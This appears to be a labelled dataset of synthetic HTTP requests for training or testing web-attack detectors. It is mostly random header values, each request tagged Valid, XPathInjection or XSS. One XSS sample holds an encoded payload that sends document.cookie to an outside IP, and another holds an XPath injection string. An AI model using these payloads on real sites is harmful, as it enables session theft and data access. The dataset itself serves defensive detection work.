Trailer: If-Modified-Since
User-Agent: nEti4 (ti4wnju11; e@0lDy1oSg; lUMF@6R5)
UA-CPU: StrongARM
UA-Disp: 466,6159,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 124x5537
Via: wh3i86/8.6 84.214.31.249, 6.6 152.243.157.211
Transfer-Encoding: gzip
Upgrade: amt/4.2, wwaier/5.7, iaqR/1.4
Warning: 076 187.215.178.176 "4XWrtebohs" 
X-Forwarded-For: 229.231.134.44
X-Serial-Number: 036660331124122
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42179
Start - Id: 22190
class: Valid
GET /e0NU/rrtlhen/5ai/JFQP/orlosmoataie/rB.w0bi-.YNr-IXZ09NJ/yfCF_GoaU/hneyit5bC8aspe7.js? HTTP/1.1
Host: www.Wdgelheze.com
Connection: stNch
Accept: audio/*, text/xml;q=0.1
Accept-Charset: windows-1258;q=0.0, iso-8859-8-i;q=0.1, x-mac-arabic;q=0.2, iso-2022-jp;q=0.7
Accept-Encoding: identity;q=0.1, compress, gzip, identity, gzip
Accept-Language: lry-siarouw, zc-slbEd;q=0.8, atoeeo-cr;q=0.4, ceWew8E-slee
Cache-Control: min-fresh=94473
Client-ip: 165.175.179.231
Cookie: raely=maI|ia4ac>arni~un;4passthru_dy=8066598
Cookie2: $Version="958"
Date: Wed, 04 Apr 07 15:40:12 UTC
ETag: W/"JivaUwlP2nrqXlKMx"
Expect: sixoriu=oErhbir
From: rieeIocb@sQdze6ug.uk
If-Modified-Since: Wed, 24 Dec 08 17:21:42 CET
If-Unmodified-Since: Sun, 24 Feb 08 15:06:47 CET
If-Match: "Ckp-xRbQB6yjalLJu"
If-None-Match: *
If-Range: "izuo9z.ibZKs01Lm0lki"
Max-Forwards: 817
MIME-Version: 1.6
Pragma: tihog='tSi1'
Proxy-Authorization: oEdcr yfam=1n8h
Authorization: sher igkt5=ewKlbryn
Range: 616571-065,-685
Referer: http://tlfcn.be/neiarmim/thDpwe25/1ldwzNaE/etbhbn/fst9Fs.zip
TE: deflate;q=0.5,trailers
Trailer: Accept-Charset
User-Agent: viulemhr1n7ovTeXjl
UA-CPU: Sparc
UA-Disp: 6686,450,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 850x114
Via: 7.3 222.202.20.72, HTTP/5.6 144.185.31.198, 7.4 www.mielewiP.png
Transfer-Encoding: compress
Upgrade: dtt6ee/8.3, tfTa/8.6, e3o/6.1, snle/8.8
Warning: 577 133.51.82.232:3250 "nwoeWd5awlant" "Sat, 28 Jul 07 24:56:13 GMT"
X-Forwarded-For: 64.80.52.43
X-Serial-Number: 29292278992836758450
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22190
Start - Id: 23255
class: Valid
GET /y2ofMUZgP8/y1DYmOiYPOiVH.html?3viCu=at3mdse&Grneuya0ld=9041847 HTTP/1.1
Host: www.ny9Fm6mx.net
Connection: e85s
Accept: */*;q=0.9
Accept-Charset: cp-936
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=566
Client-ip: 146.43.211.39
Cookie: allOm@D=52;asha5y=5279096;dTViJA=15;ucesnRcgo=tc3ossIy&mb;tiefel=\:awdacen;y0UorEma0wo=7546449429
Cookie2: $Version="8"
Date: Fri, 06 Jun 08 12:32:25 UTC
ETag: W/"4Vez3-g0IHgz9o4jot"
Expect: 100-continue
From: aFofh@flsmtees.ch
If-Modified-Since: Thu, 29 May 08 01:07:52 GMT
If-Unmodified-Since: Thu, 16 Jul 09 04:27:30 UTC
If-Match: *
If-None-Match: "KtMq6yPrGqLVqGwCWl"
If-Range: Wed, 28 Dec 05 02:27:31 UTC
Max-Forwards: 4226
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: Basic ZWFlbHRpdDppbmVkZm8=
Authorization: Digest opaque="tbtauetc"
Range: 72765-
Referer: http://izTwreu.de/hgNE.pdf
TE: trailers
Trailer: User-Agent
User-Agent: tuishht
UA-CPU: StrongARM
UA-Disp: 831,695,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 386x656
Via: 1.7 www.Osuqf.shtml:04
Transfer-Encoding: osdF; kSlp=dcot
Upgrade: atinoz/5.3, liht/0.8, qeeon/5.8, aucer/1.3
Warning: 836 www.snfril2o.jpg "cdqtacTsrnfqdneEeRe" "Sat, 16 Dec 06 14:24:55 UTC"
X-Forwarded-For: 85.19.231.197
X-Serial-Number: 045569580616206660
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23255
Start - Id: 24277
class: Valid
GET /qettaOuhhg/ntrh/hKcLDa/hVS/yd/ogazcoqs5Tln/7weeeeabsa/zLEE/uyrqctaRN.pl? HTTP/1.1
Host: 69.69.132.183
Connection: keep-alive
Accept: video/*
Accept-Charset: *;q=0.1
Accept-Encoding: gzip
Accept-Language: t-a
Cache-Control: no-store
Client-ip: 105.86.77.115
Cookie: hObB=py]rnaeostle;wDOysY=2275309;ahCsdab4irnyns=isiyaeafsc;yheont=565804;5mochaqH=hn4i1cihyfaq;ed48=p3Dwe@
Cookie2: $Version="255"
Date: Sat, 29 Oct 05 12:41:56 GMT
ETag: W/"Yfe0-6NuiP-_I.uqTw-T"
Expect: oahaiEor
From: somsctd@slielEozga.ch
If-Modified-Since: Mon, 07 Aug 06 09:01:23 GMT
If-Unmodified-Since: Sun, 25 Jan 09 18:30:45 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 31 Dec 06 07:29:46 CET
Max-Forwards: 7356
MIME-Version: 9.3
Pragma: 8Lz=adml3lly
Proxy-Authorization: Digest qop=auth-int
Authorization: NTLM OHd3ZW90ZDk2aVVvcWVoemF2MXRlZTNudGFhd29uc21TYWluaXhwYXRlbGU=
Range: 3541-,85-,-23105
Referer: http://www.paoa.be/OnAe9T0z/odtIeese.doc
TE: deflate,trailers
Trailer: Authorization
User-Agent: Mozilla/9.6 (Machintosh; U; Mac OS X 4.9; Rp-fw; rv:5.9.8) Gecko/38367213
UA-CPU: 68000
UA-Disp: 097,7605,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 982x566
Via: dlt/6.5 www.snamya.js
Transfer-Encoding: 7sety; tdeO0mrt=pmunngf
Upgrade: 4sl7/2.9, iwl/9.9
Warning: 981 www.ihudens.htm "enac" "Wed, 30 Jun 04 24:38:11 GMT"
X-Forwarded-For: 197.180.62.9
X-Serial-Number: 21325127322802331
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24277
Start - Id: 11938
class: Valid
GET /hzb2ojc4@.XH.asmx? HTTP/1.0
Host: 83.120.62.129
Connection: close
Accept: audio/basic;q=0.4
Accept-Charset: koi8
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: no-cache
Client-ip: 60.133.55.180
Cookie: 1Aaehml=875648
Cookie2: $Version="418"
Date: Mon, 06 Jul 09 18:58:59 GMT
ETag: "Z@_jrx68mt-s@PF5"
Expect: d3ttaaTm=shholg;tI4city=eotlhHha
From: iunzwloi@gsattr.biz
If-Modified-Since: Fri, 27 Jul 07 23:24:41 UTC
If-Unmodified-Since: Tue, 24 Aug 04 23:11:03 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 13 Oct 06 19:49:42 GMT
Max-Forwards: 829
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5
Authorization: Digest cnonce="eygj"
Range: 1-,-240,665474-
Referer: http://eohugr.gov/ne0oit8/k3t1p.jsp
TE: trailers,deflate;q=0.4
Trailer: If-Modified-Since
User-Agent: h2l99NlNS http://www.ei6a2vb.be
UA-CPU: x86
UA-Disp: 953,518,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 165x3870
Via: HTTP/1.3 96.101.176.43
Transfer-Encoding: gzip
Upgrade: Nnz/1.5, iTsis/1.6
Warning: 626 www.nnnan2ha.tiff "aiaet" 
X-Forwarded-For: 237.227.200.204
X-Serial-Number: 7861742222563
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11938
Start - Id: 33698
class: Valid
POST /hhtchlteclSaeods/group byPFc6ZaXD/4UP/g6l0/YOra7xpPNn1inputT/eaeyar2Nsan/GwCDy-FjAQ/zHx/wltnchhl55o/ondn8psaehabr93lsAv/rrnibydzdwlmlbvsp67/tzslLw.html? HTTP/1.0
Content-Length: 53
Content-Language: 6,d9eg,cytoriot
Content-Encoding: deflate
Content-Location: /aosasae/zIraam/yezaa.sh
Content-MD5: eG9kZmllc29ucjBvYXRwRA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 24 Nov 09 17:35:08 UTC
Last-Modified: Thu, 31 Jul 08 16:05:57 UTC
Host: www.prtgfEe.fr
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.7
Cache-Control: min-fresh=732
Client-ip: 188.178.199.117
Cookie: ohenpudkm=9bgsound3o
Cookie2: $Version="27"
Date: Wed, 18 Feb 04 21:56:54 CET
ETag: W/"OuCB_nSlEjkR3sVs"
Expect: o6Ofdort
From: eu4d2je@tmo8qmlil.org
If-Modified-Since: Sat, 26 Sep 09 08:29:04 UTC
If-Unmodified-Since: Thu, 30 Aug 07 01:00:54 GMT
If-Match: "Yd.S3dztggeY6L4V"
If-None-Match: "MALzlNbovNTllAc4uS1"
If-Range: *
Max-Forwards: 0
MIME-Version: 1.7
Pragma: no-cache
Proxy-Authorization: Digest algorithm=ubkliie
Authorization: NTLM Y2tpZXRvYWJldGZvd3JhdDZwdG9BZDBlYU9sa0hlbmVsd1Rub2Ftam5lQ2F0
Range: -803,-861752
Referer: /wekia5/imsjat/hRra/1Soc6.jsp
TE: trailers,trailers
Trailer: Max-Forwards
User-Agent: uSa1I8J http://www.tlaie.ch
UA-CPU: PowerPC
UA-Disp: 9133,083,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 603x625
Via: rs1o0i/9.7 40.195.12.30, 5.8 www.awEl.jpg
Transfer-Encoding: identity
Upgrade: nNNbft/3.3, Asmzu/4.2, arUHa4/8.0
Warning: 255 20.208.58.243 "jso9tss" "Tue, 24 Oct 06 11:42:11 CET"
X-Forwarded-For: 134.44.228.236
X-Serial-Number: 695598853636
----: -------------------------
~~~~~: ~~~~~~~~~~~~~

atdfJl=connectl mhm&1awrqewwsex=oAe nniro4&no=eybZHpp

End - Id: 33698
Start - Id: 23286
class: Valid
GET /d06Q4n1kX53wdbrTQ6G/deeis2r8uxrhs9s/cq/ePTq7VOpbui/Whd2eototi/1DijL2M@li.png?4Feir4yhab4T=9alWRnXq&sm9son4amIb=76267&AIIjobnaaeot=gexecovgohSimgradmingwhered1drop&lwwhjni=samt&la=he&m9N=sa+erel8o&idnoeeaneFwtap=2 HTTP/1.1
Host: www.awhtul.be:80
Connection: keep-alive
Accept: image/*;q=0.2, audio/*;q=0.7, image/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: no-store
Client-ip: 213.72.83.203
Cookie: qwh-9SJP_S=aYOvdwY6;.tmp2w1LR8YH=6997
Cookie2: $Version="0"
Date: Tue, 02 Dec 08 07:37:08 GMT
ETag: "ZXxsPor0lcszJI.OA18"
Expect: rsRo
From: zttea@aht7uetl.it
If-Modified-Since: Tue, 07 Jun 05 20:58:29 CET
If-Unmodified-Since: Sun, 03 Aug 08 09:12:33 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 11 May 06 10:03:46 UTC
Max-Forwards: 48
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: Digest cnonce="5tlS"
Authorization: Basic eWllM281ZTplZG5sZW5xag==
Range: -8,52-66986
Referer: http://dimPo.ch/dTin0pme/e4hocos.jpeg
TE: deflate;q=0.6
Trailer: Upgrade
User-Agent: nQNgUttkzwD
UA-CPU: MIPS
UA-Disp: 139,6869,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 1756x8385
Via: 5.6 92.3.146.193, FTP/9.4 173.219.106.79:288
Transfer-Encoding: identity
Upgrade: etro5e/7.7, dH1i/3.8, rit/1.6
Warning: 641 79.40.42.248:08 "srdtlpemraiot7g" 
X-Forwarded-For: 232.26.81.244
X-Serial-Number: 736748310370
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23286
Start - Id: 22942
class: Valid
GET /zCbinOwgetupdateDQ/rN/4cIr.tiff? HTTP/1.1
Host: 166.179.119.126
Connection: eerng
Accept: video/*;q=0.1, audio/x-wav;q=0.7
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: e5hl-tb;q=0.0, ocdr9-nl6nag;q=0.8, eaootlt-6t0fh2uu;q=0.7
Cache-Control: 3ihmsho=bta9Sr8e
Client-ip: 79.7.34.194
Cookie: yyAscriptrRnodeMDDu-=a]dtao4hl1nsj9RologA;s3jke=4egudtsoaaT0ox;o7mafcbyjr=iuAcfdlSt4rEeqr
Cookie2: $Version="2"
Date: Sun, 17 Apr 05 12:55:20 CET
ETag: "10cxI6x@TGP812f4JnMF"
Expect: c9U4=dtl8rty
From: wrmcT@heeEiet.org
If-Modified-Since: Mon, 14 Jun 04 11:00:00 GMT
If-Unmodified-Since: Sun, 13 Mar 05 09:26:07 UTC
If-Match: "qgGvtMp6yjT..DtYx8"
If-None-Match: "a1ACJ-Fezj9aemYKV"
If-Range: "lnF-uWUpvW6Y8ir2a-x."
Max-Forwards: 76
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: Digest username="snietTsh"
Authorization: eitoet deslncni=nass4gi8
Range: 3828-,508-92
Referer: /owae.asp
TE: trailers,chunked
Trailer: Pragma
User-Agent: Mozilla/6.6 (compatible; Hnx9; Open BSD i586; rie2; bf1svAe2; 4aluf)
UA-CPU: 68000
UA-Disp: 813,4500,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 159x1338
Via: 4stcm/0.9 75.243.201.129:94136
Transfer-Encoding: compress
Upgrade: bri/8.0
Warning: 116 www.qob7.png "kgn8bPjeeFe" 
X-Forwarded-For: 208.109.201.230
X-Serial-Number: 08954851223
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22942
Start - Id: 49901
class: XPathInjection
GET /aXSmqnaBJQ/y3Sg/oerrrvosaa7s9eilo/c4cGqM_@cCdU6@/Fq9VPTreplacej/0AEaVPH2z@0vWVCKh/r9mmaPtehliioraot/slDiEK/yEsmutfoeg9/wNLtbR_Y5W1/lo2eesaefetidlo.png?etse=8dsIw%27%5D+++%7C+++++P++++%7C++++%2F%2Fuser%5B+++name%2Ftext%28+++%29+%3D%27nrR&CcAr1=hr&rliataac=oeoot&LnodeQRopen=erautoexec%3E&dlef2sd=Ta%24b+msmstylea+form%28%2Fli&inneyunxgs=46220&-7VfJbhy=9566955&in8e4ieol=ieo%3F%3Drn%298jfl&Eoopoy55urdrrmu=91095797&V6NOOmd=407881&nhab=sw_&lh4rnsclos4=01975 HTTP/1.1
Host: 101.231.19.110:505
Connection: jowad
Accept: */*
Accept-Charset: utf-8;q=0.0, x-mac-cyrillic
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: max-age=17679
Client-ip: 132.190.168.5
Cookie: SoutoSehdirgneh= vs;L-FadminOXe=gc(objectcidl;lool=thCby;yy=o3fB;id7w2ONm=40;RrsreEr=sdropseAulsyql
Cookie2: $Version="8"
Date: Sun, 03 May 09 22:19:11 UTC
ETag: "J-XfPADekrBOg--rqJ"
Expect: 100-continue
From: t9xyb@dtrmz.gov
If-Modified-Since: Mon, 18 Feb 08 07:35:50 CET
If-Unmodified-Since: Sun, 14 Sep 08 04:41:05 UTC
If-Match: *
If-None-Match: "n0uj1cgdyIb4xo_hZ"
If-Range: *
Max-Forwards: 3
MIME-Version: 6.4
Pragma: neetrl='alonm'
Proxy-Authorization: NTLM T2RhYW5lcnJobG1DcjVhZHJucjdlaGFwaWlzY21vM2V0Z3Ju
Authorization: Basic c0RuZXplbGU6ZWdoYWV5eg==
Range: 794-
Referer: /dsbpcih/hwben3t/oyeo/MnriOEss.php
TE: deflate
Trailer: User-Agent
User-Agent: Mozilla/6.1 (X11; U; Linux i586 2.1; te-es; rv:4.8.6) Gecko/32289832
UA-CPU: PowerPC
UA-Disp: 2831,824,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 9591x1965
Via: 5.9 11.61.213.70:45602, 9.7 www.hdrMwlui.gif, 7.9 220.129.159.234
Transfer-Encoding: identity
Upgrade: Ez33h8/8.9, Odopt/6.7, aym/2.3, ttuho/1.9
Warning: 883 www.oeedEt.gif "90sw81n3tnalV" 
X-Forwarded-For: 49.36.115.120
X-Serial-Number: 87544886060
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49901
Start - Id: 1642
class: Valid
GET /i2mjI7W/i1XEWYTLLAaccess_logX_U/1gQ5YiqO.mdb? HTTP/1.1
Host: 167.219.250.150
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate;q=0.0, deflate;q=0.1, identity, compress;q=0.3
Accept-Language: *;q=0.8
Cache-Control: no-store
Client-ip: 172.132.14.188
Cookie: nzsamise9uf=ekzpd0cBU8
Cookie2: $Version="435"
Date: Sat, 11 Mar 06 06:13:46 UTC
ETag: W/"CM2a@nx3uTJCvZZuOS"
Expect: gattfg
From: S6tD@nser.com
If-Modified-Since: Sun, 27 Aug 06 01:10:25 GMT
If-Unmodified-Since: Sun, 13 May 07 06:00:03 CET
If-Match: "6gm9UFATU3pgRzIv"
If-None-Match: *
If-Range: Thu, 21 Jul 05 24:48:14 UTC
Max-Forwards: 671
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: NTLM bGtlYml0NGtwZTVUeXRyMGNwZWVobHJhMGR6bmNkcmVnd2E0NWxvdGwwZWht
Authorization: Basic bnVib2dlbDplZjRl
Range: 38957-
Referer: http://iimuo.uk/iwymtwl/asmic3te/e0jh/diblhusn.nsf
TE: chunked;q=0.6
Trailer: From
User-Agent: suYd4fmhnspwee9seeHc
UA-CPU: 68000
UA-Disp: 6093,2247,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 7605x6639
Via: FTP/1.1 142.15.131.34, HTTP/1.6 39.63.214.137, 4.7 204.9.174.254
Transfer-Encoding: deflate
Upgrade: 1neao/3.0, tome/1.5, athaw/7.1, axd3ou/1.8, Iet/4.7
Warning: 043 205.130.181.187:01570 "r9oi9t" "Thu, 28 Jul 05 10:14:18 GMT"
X-Forwarded-For: 111.79.187.206
X-Serial-Number: 9219304
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 1642
Start - Id: 47373
class: XSS
GET /ePTW67oR/oqqpTzeYiQHyC2eX/n@Cljb-dGfGhOe/mM9liJEGZUC/uZMcE6ZtxD/lP/dyKxDOh3X/adu7/YyFDgy.aspx?2bao=1071538637&imtakooftriwz=lB_l&xKiframeX=6&Jrrp=yeeeeR&4es6lpajkYea=39027&uokiRpqrdO=6GDcKnX&tj=ldcnuy&bqP1FcrMRdrD=rVIAIKC&yUEetljtosOtmo=%3Cbgsound+++++src%3D++++%22javascript%3A+++%5Bwindow.open%28%27http%3A%2F%2F206.255.251.40%2Fle.asp%27%2Bdocument.cookie%29%3B%5D++++%22+++%3E&otiigth59s=opassthrucl%29q%7E-%3Fioscriptu+Lwl%7E&w57eoos=ttn&s9ocid21=noC&e8ntato=oa+htts+oect7ut&olinkMMSyfP=0kvXl&@Cg6Wh6XJDUmail=rGNymT HTTP/1.0
Host: 151.201.164.86
Connection: close
Accept: video/mpeg;q=0.2, audio/*;q=0.9, application/*
Accept-Charset: x-mac-arabic, x-mac-japanese, x-mac-japanese, iso-8859-1, utf-8;q=0.0
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: max-stale
Client-ip: 61.200.67.223
Cookie: tr2eixtciyd=626116851;z74fnatusaAucA8=hsssystemstdinst7n4i9wp-isPdocument&nwindow.open;yn=t ?;zatehntri=7jtou8oaeUofa5
Cookie2: $Version="004"
Date: Mon, 14 Sep 09 10:53:19 CET
ETag: "pjFvTSd-Lm_V@ayZ5"
Expect: oloi
From: iArw@m7oEd0Y8.fr
If-Modified-Since: Sun, 11 May 08 19:33:04 CET
If-Unmodified-Since: Sat, 06 Mar 10 12:31:08 CET
If-Match: *
If-None-Match: *
If-Range: "abnUN9N._FJgAOiCT"
Max-Forwards: 480
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: NTLM M3NhVDJodHVuaWRyajZpZTBpZGlPbnRPcnB0ZWlyOXN5Y3Jsb2VpbWNlY2Y1b2c=
Authorization: Digest qop=auth-int
Range: 35419-,75138-2674,165640-
Referer: /z0neg/qgaa1l7s/ssnteiRs/m9inajTd/dh5rbeio.mspx
TE: deflate,trailers
Trailer: Trailer
User-Agent: Mozilla/9.8 (X11; U; SunOS sun4u 5.8; ai-ea; rv:2.7.6) Gecko/13803073
UA-CPU: MIPS
UA-Disp: 0297,0237,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 605x5902
Via: 5.1 www.afOraAo.tiff, FTP/6.7 www.sRswaoe.png
Transfer-Encoding: deflate
Upgrade: vihit/6.1, e9om/9.5, eo8qd/9.3
Warning: 045 www.7ot6v.tiff:40 "9ew6nQffbtqNaolon" 
X-Forwarded-For: 131.225.250.219
X-Serial-Number: 0450626600564347
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47373
Start - Id: 33555
class: Valid
POST /sxAu/IWXGQOconnect7.ZB/wga29mr-Go_VTD4CEhf/cZY-H-v3/hEea5apruidacOh/Oermnoagzi6otinb/anexeoe/ahZWUE4V7MGyWeUImT/qBwrh3B/o1/RUlocation/esL9bjote.nsf? HTTP/1.0
Content-Length: 328
Content-Language: bstpIr5,i3u,oOLn
Content-Encoding: identity
Content-Location: http://ombeo.org/ahcKu9d.nsf
Content-MD5: ZGVobnV0d2JhYW95YnJhYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 05 Nov 04 14:05:49 CET
Last-Modified: Sat, 12 Jul 08 04:45:40 UTC
Host: www.huetaeteeq.fr
Connection: keep-alive
Accept: audio/basic, video/*;q=0.2, image/jpeg
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: en-tvztdo, n4idmm-nE, toeb-roEfetNh;q=0.2, phaa3nya-eaae, eloeIsb-neiqau
Cache-Control: no-transform
Client-ip: 0.41.137.37
Cookie: samgTM5EZp=boot.ini
Cookie2: $Version="835"
Date: Wed, 19 Mar 08 19:50:40 UTC
ETag: W/"G4y63TaRjt6qV8P5.YwZ"
Expect: 100-continue
From: nndz@n7ls.fr
If-Modified-Since: Mon, 27 Feb 06 23:32:09 UTC
If-Unmodified-Since: Sat, 09 Feb 08 01:10:40 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 21 Jul 04 05:31:19 CET
Max-Forwards: 3334
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: iegu ssseMwrr=mwsot
Authorization: NTLM ZWt0RUh1VGF3Yk54YWF0aGV3bmlsZWhpdG9xaXNmZWVlaGU=
Range: -842
Referer: /hetet/cesIg5n/1a6sH/hsnhiyef.shtml
TE: trailers,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/4.4 (X11; U; SunOS sun4u 8.8; eo-zm; rv:0.6.3) Gecko/87319844
UA-CPU: PowerPC
UA-Disp: 3018,583,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 417x756
Via: 6.8 84.178.79.202, 1.7 157.79.47.219
Transfer-Encoding: compress
Upgrade: rgdr/2.7, pttC/2.5, tte/1.7, eqltXw/6.0, NuhE/6.5
Warning: 643 www.ra6U.htm:54672 "saen" 
X-Forwarded-For: 188.249.94.253
X-Serial-Number: 4054384
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ihyeeetap=uMVmptoeh99g0&lUQpeRS=rK_7NOjW.q&nybetweenZH6u33I=U-eqobjectzoohsvomv&g3o3mls=e8e4-cimZeZ&c5abe=ot&r3siddGt=uUns&rTiaticoexh=edn1ZG&sttwnunfhs5h=50&3ASEDGJjMNE_=45356322&HQIuhtpass=8j2ornGaniinrv&Ia=%nty&iOS=1B96dLJE&mCE3qDooZ=rcp&Nhttps@vBprocessing-instructiono5=;tee+>htaccese >69et&thooifoada1hr=66618196

End - Id: 33555
Start - Id: 4629
class: Valid
PUT /mKvyBagTZyFBGJQM6q.jpeg? HTTP/1.0
Content-Length: 21
Content-Language: 9Joht,li,wcdn
Content-Encoding: gzip
Content-Location: /pEHuei/nwre8/tsooess.css
Content-MD5: aW5kZGdDdDR1bnRvdHJwZg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 19 Feb 07 24:06:24 UTC
Last-Modified: Mon, 07 Jan 08 06:13:48 CET
Host: 197.109.126.249
Connection: aokdos
Accept: audio/x-wav, audio/*, text/*;q=0.1
Accept-Charset: isiri-3342, x-mac-arabic;q=0.0, windows-1255
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=39
Client-ip: 163.169.220.127
Cookie: delete@gI=ksttsrcpih)$zpRI;ht0se=0wehoi7sbcjada6mb
Cookie2: $Version="2"
Date: Sun, 03 Sep 06 10:28:42 GMT
ETag: "bcVGTihR-Glg35SMY"
Expect: rosn5
From: 9Gep2Hrs@icRis7.net
If-Modified-Since: Sat, 05 Jun 04 22:42:38 CET
If-Unmodified-Since: Sun, 08 Feb 09 13:59:04 GMT
If-Match: "zJDrw2pMqX9sD1aM"
If-None-Match: *
If-Range: Fri, 25 Jan 08 09:44:50 CET
Max-Forwards: 0
MIME-Version: 6.1
Pragma: n='et9lea'
Proxy-Authorization: Digest username="lxtiuS"
Authorization: Basic cnRpY2lvbm86b0FSbXNk
Range: -0
Referer: http://www.kss9AhE.cz/asaaD/leyeri/os9anaa/ciaohRg8.php3
TE: trailers,deflate
Trailer: Accept-Encoding
User-Agent: aeJJerl5
UA-CPU: PowerPC
UA-Disp: 183,1102,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 834x094
Via: HTTP/4.0 188.133.63.191
Transfer-Encoding: identity
Upgrade: uhu/4.6, unr/4.1, tud/0.6, tii/1.7
Warning: 848 215.17.207.198:27 "dhaswCc" "Tue, 17 Feb 09 02:45:11 CET"
X-Forwarded-For: 71.251.211.91
X-Serial-Number: 94988
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

gO9zRn=r5e4hsiabpsmhl

End - Id: 4629
Start - Id: 9427
class: Valid
GET /Tpq/binO2LVMP96/RUekc/caGrcxvSHcSK5p/r_EE96nu.asp?dh2aErfie=eycXqiN5tPEK&ipsptieEtlqnaee=03888913&divWFhKservices6=064908591&i5hecbSm=nU-Cf&atayuunun=7660&eti=oNaJ+o94r&YMPeHKPUfromVed=s4BnZY HTTP/1.1
Host: www.eaieca.it:80
Connection: keep-alive
Accept: application/*;q=0.7, text/*
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: no-transform
Client-ip: 190.80.78.33
Cookie: t14ax3tw7nt=netcatpba;8Tnessanet8TT5e=<;OrlmonaSkef=fu4hjitnplo8niFi7t;taortbulnnp=ht&Rei echomr 7yrrcp%r+%u
Cookie2: $Version="34"
Date: Fri, 08 Feb 08 18:27:42 GMT
ETag: W/"cGB72OlXPPh5qeWC"
Expect: Sy1e1tE
From: wibwt3iO@ihhho.be
If-Modified-Since: Wed, 30 Aug 06 21:54:58 UTC
If-Unmodified-Since: Mon, 21 Aug 06 06:12:35 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 06 Oct 05 08:21:27 GMT
Max-Forwards: 74
MIME-Version: 4.1
Pragma: rsuobRd=u
Proxy-Authorization: NTLM aDRla2V1NHNzZ3RuZHJOb29QaGFlZ2ZpNFNhb0N0aGFyaGFPZWhsbnV3
Authorization: 3I0n ohotn9ht=usheg
Range: 13-1,-254711
Referer: /ie2t/b6ose/Tatsa/orglA2o/la4y.cfm
TE: deflate;q=0.5,trailers
Trailer: From
User-Agent: Mozilla/3.8 (Machintosh; U; PPC 5.0; jn-ld; rv:9.6.1) Gecko/13501327
UA-CPU: 68000
UA-Disp: 269,5048,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 413x817
Via: FTP/6.9 www.ianlee.css
Transfer-Encoding: deflate
Upgrade: n1s/5.5, lmwiso/3.8, Tal9/6.5, E6Ia/4.3
Warning: 452 187.79.238.59 "essopd" 
X-Forwarded-For: 24.185.22.139
X-Serial-Number: 637220700897
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9427
Start - Id: 39458
class: SSI
